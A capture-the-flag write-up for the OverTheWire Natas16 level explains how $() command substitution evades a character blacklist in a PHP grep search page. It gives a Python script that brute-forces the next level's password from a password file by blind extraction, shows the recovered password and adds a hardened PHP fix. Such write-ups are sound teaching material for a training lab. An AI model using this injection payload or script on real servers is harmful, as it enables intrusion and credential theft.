Natas16 - natas17

From JaxHax

Level Goal

For security reasons, we now filter even more on certain characters

Find words containing: [___________________] [Search]

Output:
<View sourcecode>


Solution

Decided to click the <View sourcecode> link, which goes to http://natas16.natas.labs.overthewire.org/index-source.html

It gave me the following code:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas16", "pass": "<censored>" };</script></head>
<body>
<h1>natas16</h1>
<div id="content">

For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>


So this is the same as natas9, but with more filtering. The blacklist catches `;`, `|`, `&`, backticks and both quote characters, but they forgot "$()", so we can still execute commands inside the double-quoted grep argument. However, with double quotes filtered we cannot break out of the grep command itself, so we have to work within it. What we can do is a blind extraction, much like a blind SQL injection: we place a "$(grep ...)" against the password file right next to a word we know is in the dictionary (here "Africans"). If the inner grep matches nothing, the outer grep simply searches for "Africans" and that line comes back. If the inner grep does match, its output is prepended to "Africans", the outer grep searches for something that is not in the dictionary, and no results come back. Anchoring the inner grep with "^" lets us confirm the password one prefix at a time, so we can brute force the value in the password file character by character. Since it is 32 characters long, doing this by hand would be a hassle. Here is some Python code to do what we need.
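To see why the filter fails and what the fix looks like, here is an added example (not the level's own code and not part of the original writeup) that puts the level's blacklist check beside a hardened version of the same search feature. The function names, the length limit and the probe string are assumptions made for this illustration.

```php
<?php
// Added example, not the Natas level's code: the level's blacklist check
// beside a hardened way of building the same grep command.

// The level's approach: a character blacklist. Anything the list does not
// name, such as the $( ... ) command substitution, still reaches the shell
// inside the double-quoted grep argument.
function is_blacklisted(string $key): bool {
    return preg_match('/[;|&`\'"]/', $key) === 1;
}

// Hardened approach: allow only the characters a dictionary-word search
// needs (an allowlist, not a blacklist), then let escapeshellarg() turn the
// value into a single literal argument. "--" keeps a leading "-" from being
// read by grep as an option. Returns null when the input is rejected.
// The 64-character limit is an assumed, arbitrary bound for this example.
function build_grep_command(string $key): ?string {
    if ($key === '' || strlen($key) > 64) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9]+$/', $key)) {
        return null;
    }
    return 'grep -i -- ' . escapeshellarg($key) . ' dictionary.txt';
}

// Constructed probe in the same shape as the writeup's payload: a command
// substitution glued onto a real dictionary word.
$probe = '$(true)Africans';

var_dump(is_blacklisted($probe));          // the blacklist does not flag it
var_dump(build_grep_command($probe));      // the allowlist rejects it
var_dump(build_grep_command('Africans'));  // a plain word is quoted and allowed
```

Run with `php example.php`: the blacklist check returns false for the probe, while the hardened builder returns null for it and a quoted command for the plain word. Keeping the allowlist in front of escapeshellarg() matters because escapeshellarg() only makes the value a safe shell argument; it does not stop grep from interpreting regular-expression metacharacters, which the allowlist removes.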


import http.client
import urllib.parse
import base64
import datetime

CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
CREDS = "natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
HOST = "natas16.natas.labs.overthewire.org"

conn = http.client.HTTPConnection(HOST)
# HTTP Basic auth header built from the natas16 level credentials
headers = {"Authorization": "Basic %s" % base64.b64encode(CREDS.encode()).decode()}

startTime = datetime.datetime.now().strftime("%m/%d/%Y %I:%M %p")


print("\n\t\033[33;1m---===[ Natas 16 Grep Bruteforcer ]===---\033[0m\n")
print(" [*] Brute force Started!")

i = 0
passwd = ""
while i != 32:
    for c in CHARSET:
        passwd += c
        # The $(...) runs inside the double-quoted grep argument. If the guessed
        # prefix matches the password file, its output is prepended to "Africans"
        # and the outer grep finds nothing; otherwise the word "Africans" is found.
        needle = urllib.parse.quote_plus("$(grep ^" + passwd + ".* /etc/natas_webpass/natas17)Africans")
        conn.request("GET", "/?needle=" + needle + "&submit=Search", "", headers)
        res = conn.getresponse()
        if res.status == 200:
            data = res.read().decode("utf-8", "replace")
            if data.find("Africans") < 0:
                # No dictionary hit: the guessed prefix is correct, keep it
                print(" [*] %02d => Current Password: %s" % (i + 1, passwd))
                i += 1
                break
            else:
                # Wrong guess: drop the last character and try the next one
                passwd = passwd[:-1]
        else:
            print(" \033[31;1m[*] Got HTTP status:\033[0m %d" % res.status)
        conn.close()
print(" [*] Think we got it : %s" % passwd)
endTime = datetime.datetime.now().strftime("%m/%d/%Y %I:%M %p")
print(" [*] Start Time: %s" % startTime)
print(" [*] End Time: %s" % endTime)


If we run that code we get the following output:


$ python natas16.py 

	---===[ Natas 16 Grep Bruteforcer ]===---

 [*] Brute force Started!
 [*] 01 => Current Password: 8
 [*] 02 => Current Password: 8P
 [*] 03 => Current Password: 8Ps
 [*] 04 => Current Password: 8Ps3
 [*] 05 => Current Password: 8Ps3H
 [*] 06 => Current Password: 8Ps3H0
 [*] 07 => Current Password: 8Ps3H0G
 [*] 08 => Current Password: 8Ps3H0GW
 [*] 09 => Current Password: 8Ps3H0GWb
 [*] 10 => Current Password: 8Ps3H0GWbn
 [*] 11 => Current Password: 8Ps3H0GWbn5
 [*] 12 => Current Password: 8Ps3H0GWbn5r
 [*] 13 => Current Password: 8Ps3H0GWbn5rd
 [*] 14 => Current Password: 8Ps3H0GWbn5rd9
 [*] 15 => Current Password: 8Ps3H0GWbn5rd9S
 [*] 16 => Current Password: 8Ps3H0GWbn5rd9S7
 [*] 17 => Current Password: 8Ps3H0GWbn5rd9S7G
 [*] 18 => Current Password: 8Ps3H0GWbn5rd9S7Gm
 [*] 19 => Current Password: 8Ps3H0GWbn5rd9S7GmA
 [*] 20 => Current Password: 8Ps3H0GWbn5rd9S7GmAd
 [*] 21 => Current Password: 8Ps3H0GWbn5rd9S7GmAdg
 [*] 22 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQ
 [*] 23 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQN
 [*] 24 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNd
 [*] 25 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdk
 [*] 26 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkh
 [*] 27 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhP
 [*] 28 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPk
 [*] 29 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq
 [*] 30 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9
 [*] 31 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c
 [*] 32 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
 [*] Think we got it : 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
 [*] Start Time: 07/26/2016 06:40 AM
 [*] End Time: 07/26/2016 06:45 AM

$